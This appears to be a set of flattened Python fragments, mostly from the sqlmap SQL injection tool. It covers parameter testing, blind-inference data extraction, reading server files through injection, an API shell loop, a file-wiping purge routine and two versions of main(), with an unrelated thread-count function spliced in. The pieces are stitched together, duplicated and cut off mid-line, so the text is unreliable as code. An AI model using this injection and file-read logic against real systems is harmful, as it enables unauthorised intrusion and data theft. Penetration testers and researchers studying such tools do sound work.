continue if kb.testOnlyCustom and place not in ( PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER): continue if place not in conf.paramDict: continue paramDict = conf.paramDict[place] paramType = conf.method if conf.method not in ( None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place for parameter, value in paramDict.items(): if not proceed: break kb.vainRun = False testSqlInj = True paramKey = (conf.hostname, conf.path, place, parameter) if paramKey in kb.testedParams: testSqlInj = False infoMsg = "skipping previously processed %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) elif parameter in conf.testParameter: pass elif parameter == conf.rParam: testSqlInj = False infoMsg = "skipping randomizing %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) elif parameter in conf.skip or kb.postHint and parameter.split( ' ')[-1] in conf.skip: testSqlInj = False infoMsg = "skipping %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) elif conf.paramExclude and ( re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I)): testSqlInj = False infoMsg = "skipping %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) elif parameter == conf.csrfToken: testSqlInj = False infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter logger.info(infoMsg) # Ignore session-like parameters for --level < 4 elif conf.level < 4 and ( parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith( GOOGLE_ANALYTICS_COOKIE_PREFIX)): testSqlInj = False infoMsg = "ignoring %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech or conf.skipStatic: check = checkDynParam(place, parameter, value) if not check: warnMsg = "%s parameter '%s' does not appear to be dynamic" % ( paramType, parameter) logger.warn(warnMsg) if conf.skipStatic: infoMsg = "skipping static %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) testSqlInj = False else: infoMsg = "%s parameter '%s' is dynamic" % ( paramType, parameter) logger.info(infoMsg) kb.testedParams.add(paramKey) if testSqlInj: try: if place == PLACE.COOKIE: pushValue(kb.mergeCookies) kb.mergeCookies = False check = heuristicCheckSqlInjection( place, parameter) if check != HEURISTIC_TEST.POSITIVE: if conf.smart or ( kb.ignoreCasted and check == HEURISTIC_TEST.CASTED): infoMsg = "skipping %s parameter '%s'" % ( paramType, parameter) logger.info(infoMsg) continue infoMsg = "testing for SQL injection on %s " % paramType infoMsg += "parameter '%s'" % parameter logger.info(infoMsg) injection = checkSqlInjection( place, parameter, value) proceed = not kb.endDetection injectable = False if getattr(injection, "place", None) is not None: if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE in injection.notes: kb.falsePositives.append(injection) else: injectable = True kb.injections.append(injection) # In case when user wants to end detection phase (Ctrl+C) if not proceed: break msg = "%s parameter '%s' " % ( injection.place, injection.parameter) msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] " test = readInput(msg, default="N") if test[0] not in ("y", "Y"): proceed = False paramKey = (conf.hostname, conf.path, None, None) kb.testedParams.add(paramKey) if not injectable: warnMsg = "%s parameter '%s' does not seem to be " % ( paramType, parameter) warnMsg += "injectable" logger.warn(warnMsg) finally: if place == PLACE.COOKIE: kb.mergeCookies = popValue() if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None): if kb.vainRun and not conf.multipleTargets: errMsg = "no parameter(s) found for testing in the provided data " errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')" raise SqlmapNoneDataException(errMsg) else: errMsg = "all tested parameters appear to be not injectable." if conf.level < 5 or conf.risk < 3: errMsg += " Try to increase '--level'/'--risk' values " errMsg += "to perform more tests." if isinstance(conf.tech, list) and len(conf.tech) < 5: errMsg += " Rerun without providing the option '--technique'." if not conf.textOnly and kb.originalPage: percent = ( 100.0 * len(getFilteredPageContent(kb.originalPage)) / len(kb.originalPage)) if kb.dynamicMarkings: errMsg += " You can give it a go with the switch '--text-only' " errMsg += "if the target page has a low percentage " errMsg += "of textual content (~%.2f%% of " % percent errMsg += "page content is text)." elif percent < LOW_TEXT_PERCENT and not kb.errorIsNone: errMsg += " Please retry with the switch '--text-only' " errMsg += "(along with --technique=BU) as this case " errMsg += "looks like a perfect candidate " errMsg += "(low textual content along with inability " errMsg += "of comparison engine to detect at least " errMsg += "one dynamic parameter)." if kb.heuristicTest == HEURISTIC_TEST.POSITIVE: errMsg += " As heuristic test turned out positive you are " errMsg += "strongly advised to continue on with the tests. " errMsg += "Please, consider usage of tampering scripts as " errMsg += "your target might filter the queries." if not conf.string and not conf.notString and not conf.regexp: errMsg += " Also, you can try to rerun by providing " errMsg += "either a valid value for option '--string' " errMsg += "(or '--regexp')." elif conf.string: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--string' as perhaps the string you " errMsg += "have chosen does not match " errMsg += "exclusively True responses." elif conf.regexp: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--regexp' as perhaps the regular " errMsg += "expression that you have chosen " errMsg += "does not match exclusively True responses." if not conf.tamper: errMsg += " If you suspect that there is some kind of protection mechanism " errMsg += "involved (e.g. WAF) maybe you could retry " errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')" raise SqlmapNotVulnerableException(errMsg.rstrip('.')) else: # Flush the flag kb.testMode = False _saveToResultsFile() _saveToHashDB() _showInjections() _selectInjection() if kb.injection.place is not None and kb.injection.parameter is not None: if conf.multipleTargets: message = "do you want to exploit this SQL injection? [Y/n] " exploit = readInput(message, default="Y") condition = not exploit or exploit[0] in ("y", "Y") else: condition = True if condition: action() except KeyboardInterrupt: if conf.multipleTargets: warnMsg = "user aborted in multiple target mode" logger.warn(warnMsg) message = "do you want to skip to the next target in list? [Y/n/q]" test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): pass elif test[0] in ("n", "N"): return False elif test[0] in ("q", "Q"): raise SqlmapUserQuitException else: raise except SqlmapUserQuitException: raise except SqlmapSilentQuitException: raise except SqlmapBaseException, ex: errMsg = getSafeExString(ex) if conf.multipleTargets: _saveToResultsFile() errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL") logger.error(errMsg.lstrip(", ")) else: logger.critical(errMsg) return False finally:
def thread_register(args): if not 0 < args.thread < 501: msg = '输入的线程数量错误 [-t] , 范围: 1 - 500.' sys.exit(logger.error(msg)) conf['thread_num'] = args.thread logger.sysinfo("设置线程数量: %s" % str(conf['thread_num']))
def readFile(self, remoteFile): localFilePaths = [] self.checkDbmsOs() for remoteFile in remoteFile.split(','): fileContent = None kb.fileReadMode = True if conf.direct or isStackingAvailable(): if isStackingAvailable(): debugMsg = "going to read the file with stacked query SQL " debugMsg += "injection technique" logger.debug(debugMsg) fileContent = self.stackedReadFile(remoteFile) elif Backend.isDbms(DBMS.MYSQL): debugMsg = "going to read the file with a non-stacked query " debugMsg += "SQL injection technique" logger.debug(debugMsg) fileContent = self.nonStackedReadFile(remoteFile) else: errMsg = "none of the SQL injection techniques detected can " errMsg += "be used to read files from the underlying file " errMsg += "system of the back-end %s server" % Backend.getDbms( ) logger.error(errMsg) fileContent = None kb.fileReadMode = False if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) elif isListLike(fileContent): newFileContent = "" for chunk in fileContent: if isListLike(chunk): if len(chunk) > 0: chunk = chunk[0] else: chunk = "" if chunk: newFileContent += chunk fileContent = newFileContent if fileContent is not None: fileContent = decodeDbmsHexValue(fileContent, True) if fileContent.strip(): localFilePath = dataToOutFile(remoteFile, fileContent) if not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) sameFile = self.askCheckReadFile(localFilePath, remoteFile) if sameFile is True: localFilePath += " (same file)" elif sameFile is False: localFilePath += " (size differs from remote file)" localFilePaths.append(localFilePath) elif not kb.bruteMode: errMsg = "no data retrieved" logger.error(errMsg) return localFilePaths
def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False): """ Retrieve the output of a SQL query characted by character taking advantage of an blind SQL injection vulnerability on the affected parameter through a bisection algorithm. """ initTechnique(getTechnique()) query = agent.prefixQuery(getTechniqueData().vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) count = None startLimit = 0 stopLimit = None outputs = BigArray() if not unpack: return _goInference(payload, expression, charsetType, firstChar, lastChar, dump) _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) rdbRegExp = re.search(r"RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD): expressionFieldsList = [expressionFields] if len(expressionFieldsList) > 1: infoMsg = "the SQL query provided has more than one field. " infoMsg += "sqlmap will now unpack it into distinct queries " infoMsg += "to be able to retrieve the output even if we " infoMsg += "are going blind" logger.info(infoMsg) # If we have been here from SQL query/shell we have to check if # the SQL query might return multiple entries and in such case # forge the SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table # can return multiple entries if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) if limitCond: test = True if not stopLimit or stopLimit <= 1: if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]): test = False if test: # Count the number of SQL query entries output countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] countedExpression = expression.replace(expressionFields, countFirstField, 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] if not stopLimit: count = _goInference(payload, countedExpression, charsetType=CHARSET_TYPE.DIGITS, firstChar=firstChar, lastChar=lastChar) if isNumPosStrValue(count): count = int(count) if batch or count == 1: stopLimit = count else: message = "the SQL query provided can return " message += "%d entries. How many " % count message += "entries do you want to retrieve?\n" message += "[a] All (default)\n[#] Specific number\n" message += "[q] Quit" choice = readInput(message, default='A').upper() if choice == 'A': stopLimit = count elif choice == 'Q': raise SqlmapUserQuitException elif isDigit(choice) and int(choice) > 0 and int(choice) <= count: stopLimit = int(choice) infoMsg = "sqlmap is now going to retrieve the " infoMsg += "first %d query output entries" % stopLimit logger.info(infoMsg) elif choice in ('#', 'S'): message = "how many? " stopLimit = readInput(message, default="10") if not isDigit(stopLimit): errMsg = "invalid choice" logger.error(errMsg) return None else: stopLimit = int(stopLimit) else: errMsg = "invalid choice" logger.error(errMsg) return None elif count and not isDigit(count): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) return None elif (not stopLimit or stopLimit == 0): return None try: try: for num in xrange(startLimit or 0, stopLimit or 0): output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) outputs.append(output) except OverflowError: errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) errMsg += "with switch '--fresh-queries'" raise SqlmapDataException(errMsg) except KeyboardInterrupt: print() warnMsg = "user aborted during dumping phase" logger.warn(warnMsg) return outputs elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper(): expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()] outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) return ", ".join(output or "" for output in outputs) if not isNoneValue(outputs) else None
taskid = None logger.info("Type 'help' or '?' for list of available commands") while True: try: command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip() command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command) except (EOFError, KeyboardInterrupt): print break if command in ("data", "log", "status", "stop", "kill"): if not taskid: logger.error("No task ID in use") continue raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) res = dejsonize(raw) if not res["success"]: logger.error("Failed to execute command %s" % command) dataToStdout("%s\n" % raw) elif command.startswith("option"): if not taskid: logger.error("No task ID in use") continue try: command, option = command.split(" ") except ValueError: raw = _client("%s/option/%s/list" % (addr, taskid))
def purge(directory): """ Safely removes content from a given directory """ if not os.path.isdir(directory): warnMsg = "skipping purging of directory '%s' as it does not exist" % directory logger.warn(warnMsg) return infoMsg = "purging content of directory '%s'..." % directory logger.info(infoMsg) filepaths = [] dirpaths = [] for rootpath, directories, filenames in os.walk(directory): dirpaths.extend( os.path.abspath(os.path.join(rootpath, _)) for _ in directories) filepaths.extend( os.path.abspath(os.path.join(rootpath, _)) for _ in filenames) logger.debug("changing file attributes") for filepath in filepaths: try: os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE) except: pass logger.debug("writing random data to files") for filepath in filepaths: try: filesize = os.path.getsize(filepath) with openFile(filepath, "w+b") as f: f.write("".join( _unichr(random.randint(0, 255)) for _ in xrange(filesize))) except: pass logger.debug("truncating files") for filepath in filepaths: try: with open(filepath, 'w') as f: pass except: pass logger.debug("renaming filenames to random values") for filepath in filepaths: try: os.rename( filepath, os.path.join( os.path.dirname(filepath), "".join( random.sample(string.ascii_letters, random.randint(4, 8))))) except: pass dirpaths.sort(key=functools.cmp_to_key( lambda x, y: y.count(os.path.sep) - x.count(os.path.sep))) logger.debug("renaming directory names to random values") for dirpath in dirpaths: try: os.rename( dirpath, os.path.join( os.path.dirname(dirpath), "".join( random.sample(string.ascii_letters, random.randint(4, 8))))) except: pass logger.debug("deleting the whole directory tree") try: shutil.rmtree(directory) except OSError as ex: logger.error("problem occurred while removing directory '%s' ('%s')" % (getUnicode(directory), getSafeExString(ex)))
def main(): """ Main function of sqlmap when running from command line. """ try: dirtyPatches() resolveCrossReferences() checkEnvironment() setPaths(modulePath()) banner() # Store original command line options for possible later restoration cmdLineOptions.update(cmdLineParser().__dict__) initOptions(cmdLineOptions) if checkPipedInput(): conf.batch = True if conf.get("api"): # heavy imports from lib.utils.api import StdDbOut from lib.utils.api import setRestAPILog # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) init() if not conf.updateAll: # Postponed imports (faster start) if conf.smokeTest: from lib.core.testing import smokeTest os._exitcode = 1 - (smokeTest() or 0) elif conf.vulnTest: from lib.core.testing import vulnTest os._exitcode = 1 - (vulnTest() or 0) elif conf.liveTest: from lib.core.testing import liveTest os._exitcode = 1 - (liveTest() or 0) else: from lib.controller.controller import start if conf.profile and six.PY2: from lib.core.profiling import profile globals()["start"] = start profile() else: try: start() except Exception as ex: os._exitcode = 1 if "can't start new thread" in getSafeExString(ex): errMsg = "unable to start new threads. Please check OS (u)limits" logger.critical(errMsg) raise SystemExit else: raise except SqlmapUserQuitException: if not conf.batch: errMsg = "user quit" logger.error(errMsg) except (SqlmapSilentQuitException, bdb.BdbQuit): pass except SqlmapShellQuitException: cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) raise SystemExit except KeyboardInterrupt: print() except EOFError: print() errMsg = "exit" logger.error(errMsg) except SystemExit: pass except: print() errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() valid = checkIntegrity() if valid is False: errMsg = "code integrity check failed (turning off automatic issue creation). " errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) print() dataToStdout(excMsg) raise SystemExit elif any(_ in excMsg for _ in ("tamper/", "waf/")): logger.critical(errMsg) print() dataToStdout(excMsg) raise SystemExit elif any(_ in excMsg for _ in ("ImportError", "Can't find file for module")): errMsg = "invalid runtime environment ('%s')" % excMsg.split( "Error: ")[-1].strip() logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")): errMsg = "memory exhaustion detected" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded", "Disk full while accessing")): errMsg = "no space left on output device" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("The paging file is too small", )): errMsg = "no space left for paging file" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "_'")): errMsg = "corrupted installation detected ('%s'). " % excMsg.strip( ).split('\n')[-1] errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) raise SystemExit elif "Read-only file system" in excMsg: errMsg = "output device is mounted as read-only" logger.critical(errMsg) raise SystemExit elif "OperationalError: disk I/O error" in excMsg: errMsg = "I/O error on output device" logger.critical(errMsg) raise SystemExit elif "Violation of BIDI" in excMsg: errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" logger.critical(errMsg) raise SystemExit elif "Invalid IPv6 URL" in excMsg: errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1] logger.critical(errMsg) raise SystemExit elif "_mkstemp_inner" in excMsg: errMsg = "there has been a problem while accessing temporary files" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp")): errMsg = "unable to write to the temporary directory '%s'. " % tempfile.gettempdir( ) errMsg += "Please make sure that your disk is not full and " errMsg += "that you have sufficient write permissions to " errMsg += "create temporary files and/or directories" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " errMsg += "(Reference: https://github.com/PyMySQL/PyMySQL/issues/700)" logger.critical(errMsg) raise SystemExit elif "must be pinned buffer, not bytearray" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7. Please update accordingly " errMsg += "(Reference: https://bugs.python.org/issue8104)" logger.critical(errMsg) raise SystemExit elif "can't start new thread" in excMsg: errMsg = "there has been a problem while creating new thread instance. " errMsg += "Please make sure that you are not running too many processes" if not IS_WIN: errMsg += " (or increase the 'ulimit -u' value)" logger.critical(errMsg) raise SystemExit elif "'DictObject' object has no attribute '" in excMsg and all( _ in errMsg for _ in ("(fingerprinted)", "(identified)")): errMsg = "there has been a problem in enumeration. " errMsg += "Because of a considerable chance of false-positive case " errMsg += "you are advised to rerun with switch '--flush-session'" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("pymysql", "configparser")): errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" logger.critical(errMsg) raise SystemExit elif "bad marshal data (unknown type code)" in excMsg: match = re.search(r"\s*(.+)\s+ValueError", excMsg) errMsg = "one of your .pyc files are corrupted%s" % ( " ('%s')" % match.group(1) if match else "") errMsg += ". Please delete .pyc files on your system to fix the problem" logger.critical(errMsg) raise SystemExit elif kb.get("dumpKeyboardInterrupt"): raise SystemExit elif any(_ in excMsg for _ in ("Broken pipe", )): raise SystemExit for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) try: file_ = os.path.relpath(file_, os.path.dirname(__file__)) except ValueError: pass file_ = file_.replace("\\", '/') if "../" in file_: file_ = re.sub(r"(\.\./)+", '/', file_) else: file_ = file_.lstrip('/') file_ = re.sub(r"/{2,}", '/', file_) excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) excMsg = maskSensitiveData(excMsg) if conf.get("api") or not valid: logger.critical("%s\n%s" % (errMsg, excMsg)) else: logger.critical(errMsg) dataToStdout("%s\n" % setColor(excMsg.strip(), level=logging.CRITICAL)) createGithubIssue(errMsg, excMsg) finally: kb.threadContinue = False _ = getDaysFromLastUpdate() if _ > LAST_UPDATE_NAGGING_DAYS: warnMsg = "you haven't updated sqlmap for more than %d days!!!" % _ logger.warn(warnMsg) if conf.get("showTime"): dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) kb.threadException = True if kb.get("tempDir"): for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): for filepath in glob.glob( os.path.join(kb.tempDir, "%s*" % prefix)): try: os.remove(filepath) except OSError: pass if not filterNone( filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any( filepath.endswith(_) for _ in (".lock", ".exe", ".so", '_'))): # ignore junk files try: shutil.rmtree(kb.tempDir, ignore_errors=True) except OSError: pass if conf.get("hashDB"): conf.hashDB.flush(True) if conf.get("harFile"): try: with openFile(conf.harFile, "w+b") as f: json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) if conf.get("api"): conf.databaseCursor.disconnect() if conf.get("dumper"): conf.dumper.flush() # short delay for thread finalization _ = time.time() while threading.activeCount() > 1 and ( time.time() - _) > THREAD_FINALIZATION_TIMEOUT: time.sleep(0.01) if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() conf.disableBanner = True main()
def main(): """ Main function of sqlmap when running from command line. """ try: dirtyPatches() resolveCrossReferences() checkEnvironment() setPaths(modulePath()) banner() # Store original command line options for possible later restoration args = cmdLineParser() cmdLineOptions.update(args.__dict__ if hasattr(args, "__dict__") else args) initOptions(cmdLineOptions) if checkPipedInput(): conf.batch = True if conf.get("api"): # heavy imports from lib.utils.api import StdDbOut from lib.utils.api import setRestAPILog # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) init() if not conf.updateAll: # Postponed imports (faster start) if conf.smokeTest: from lib.core.testing import smokeTest os._exitcode = 1 - (smokeTest() or 0) elif conf.vulnTest: from lib.core.testing import vulnTest os._exitcode = 1 - (vulnTest() or 0) else: from lib.controller.controller import start if conf.profile: from lib.core.profiling import profile globals()["start"] = start profile() else: try: if conf.crawlDepth and conf.bulkFile: targets = getFileItems(conf.bulkFile) for i in xrange(len(targets)): target = None try: kb.targets = OrderedSet() target = targets[i] if not re.search(r"(?i)\Ahttp[s]*://", target): target = "http://%s" % target infoMsg = "starting crawler for target URL '%s' (%d/%d)" % (target, i + 1, len(targets)) logger.info(infoMsg) crawl(target) except Exception as ex: if target and not isinstance(ex, SqlmapUserQuitException): errMsg = "problem occurred while crawling '%s' ('%s')" % (target, getSafeExString(ex)) logger.error(errMsg) else: raise else: if kb.targets: start() else: start() except Exception as ex: os._exitcode = 1 if "can't start new thread" in getSafeExString(ex): errMsg = "unable to start new threads. Please check OS (u)limits" logger.critical(errMsg) raise SystemExit else: raise except SqlmapUserQuitException: if not conf.batch: errMsg = "user quit" logger.error(errMsg) except (SqlmapSilentQuitException, bdb.BdbQuit): pass except SqlmapShellQuitException: cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) os._exitcode = 1 raise SystemExit except KeyboardInterrupt: print() except EOFError: print() errMsg = "exit" logger.error(errMsg) except SystemExit as ex: os._exitcode = ex.code or 0 except: print() errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() valid = checkIntegrity() os._exitcode = 255 if any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")): errMsg = "memory exhaustion detected" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded", "Disk full while accessing")): errMsg = "no space left on output device" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("The paging file is too small",)): errMsg = "no space left for paging file" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("Access is denied", "subprocess", "metasploit")): errMsg = "permission error occurred while running Metasploit" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("Permission denied", "metasploit")): errMsg = "permission error occurred while using Metasploit" logger.critical(errMsg) raise SystemExit elif "Read-only file system" in excMsg: errMsg = "output device is mounted as read-only" logger.critical(errMsg) raise SystemExit elif "Insufficient system resources" in excMsg: errMsg = "resource exhaustion detected" logger.critical(errMsg) raise SystemExit elif "OperationalError: disk I/O error" in excMsg: errMsg = "I/O error on output device" logger.critical(errMsg) raise SystemExit elif "Violation of BIDI" in excMsg: errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" logger.critical(errMsg) raise SystemExit elif "Invalid IPv6 URL" in excMsg: errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1] logger.critical(errMsg) raise SystemExit elif "_mkstemp_inner" in excMsg: errMsg = "there has been a problem while accessing temporary files" logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp", "tempfile.py")): errMsg = "unable to write to the temporary directory '%s'. " % tempfile.gettempdir() errMsg += "Please make sure that your disk is not full and " errMsg += "that you have sufficient write permissions to " errMsg += "create temporary files and/or directories" logger.critical(errMsg) raise SystemExit elif "Permission denied: '" in excMsg: match = re.search(r"Permission denied: '([^']*)", excMsg) errMsg = "permission error occurred while accessing file '%s'" % match.group(1) logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " errMsg += "(Reference: 'https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe')" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " errMsg += "(Reference: 'https://github.com/PyMySQL/PyMySQL/issues/700')" logger.critical(errMsg) raise SystemExit elif "must be pinned buffer, not bytearray" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7. Please update accordingly " errMsg += "(Reference: 'https://bugs.python.org/issue8104')" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("OSError: [Errno 22] Invalid argument: '", "importlib")): errMsg = "unable to read file '%s'" % extractRegexResult(r"OSError: \[Errno 22\] Invalid argument: '(?P<result>[^']+)", excMsg) logger.critical(errMsg) raise SystemExit elif "hash_randomization" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7.3. Please update accordingly " errMsg += "(Reference: 'https://docs.python.org/2/library/sys.html')" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("Resource temporarily unavailable", "os.fork()", "dictionaryAttack")): errMsg = "there has been a problem while running the multiprocessing hash cracking. " errMsg += "Please rerun with option '--threads=1'" logger.critical(errMsg) raise SystemExit elif "can't start new thread" in excMsg: errMsg = "there has been a problem while creating new thread instance. " errMsg += "Please make sure that you are not running too many processes" if not IS_WIN: errMsg += " (or increase the 'ulimit -u' value)" logger.critical(errMsg) raise SystemExit elif "can't allocate read lock" in excMsg: errMsg = "there has been a problem in regular socket operation " errMsg += "('%s')" % excMsg.strip().split('\n')[-1] logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("pymysql", "configparser")): errMsg = "wrong initialization of 'pymsql' detected (using Python3 dependencies)" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("ntlm", "socket.error, err", "SyntaxError")): errMsg = "wrong initialization of 'python-ntlm' detected (using Python2 syntax)" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("drda", "to_bytes")): errMsg = "wrong initialization of 'drda' detected (using Python3 syntax)" logger.critical(errMsg) raise SystemExit elif "'WebSocket' object has no attribute 'status'" in excMsg: errMsg = "wrong websocket library detected" errMsg += " (Reference: 'https://github.com/sqlmapproject/sqlmap/issues/4572#issuecomment-775041086')" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("window = tkinter.Tk()",)): errMsg = "there has been a problem in initialization of GUI interface " errMsg += "('%s')" % excMsg.strip().split('\n')[-1] logger.critical(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("unable to access item 'liveTest'",)): errMsg = "detected usage of files from different versions of sqlmap" logger.critical(errMsg) raise SystemExit elif kb.get("dumpKeyboardInterrupt"): raise SystemExit elif any(_ in excMsg for _ in ("Broken pipe",)): raise SystemExit elif valid is False: errMsg = "code integrity check failed (turning off automatic issue creation). " errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) print() dataToStdout(excMsg) raise SystemExit elif any(_ in "%s\n%s" % (errMsg, excMsg) for _ in ("tamper/", "waf/", "--engagement-dojo")): logger.critical(errMsg) print() dataToStdout(excMsg) raise SystemExit elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "<frozen", "Can't find file for module", "SAXReaderNotAvailable", "source code string cannot contain null bytes", "No module named", "tp_name field", 